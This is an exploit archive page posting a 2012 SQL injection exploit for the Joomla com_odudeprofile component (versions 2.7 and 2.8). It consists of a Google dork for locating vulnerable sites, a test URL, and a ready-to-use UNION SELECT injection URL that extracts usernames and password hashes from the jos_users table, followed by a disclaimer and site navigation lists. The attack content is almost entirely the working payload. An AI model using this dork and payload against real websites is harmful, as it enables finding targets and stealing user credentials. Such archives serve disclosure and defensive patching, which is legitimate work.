Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection: Posted Jul 25, 2012; Authored by Daniel Barragan; Joomla Odudeprofile component version 2.x suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8b5536a92abeb5455576bdcda4e58fb09ea7f7b74b19c495050cdfec88ce5f79; Download | Favorite | View

Joomla Odudeprofile 2.x SQL Injection

______________________________________________________________________________________
 
 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.odude.com

 Version: 2.7 & 2.8

 Download: http://www.odude.com/home/profile.html

 License: Non-Commercial
 
 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

    
  Sql:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


      DEMO1:

                     http://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20


     


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"

Top Authors In Last 30 Days

Red Hat 276 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 5 files
kai6u 3 files
Adam Gowdiak 3 files
liquidsky 3 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Odudeprofile 2.x SQL Injection

Share This

Joomla Odudeprofile 2.x SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems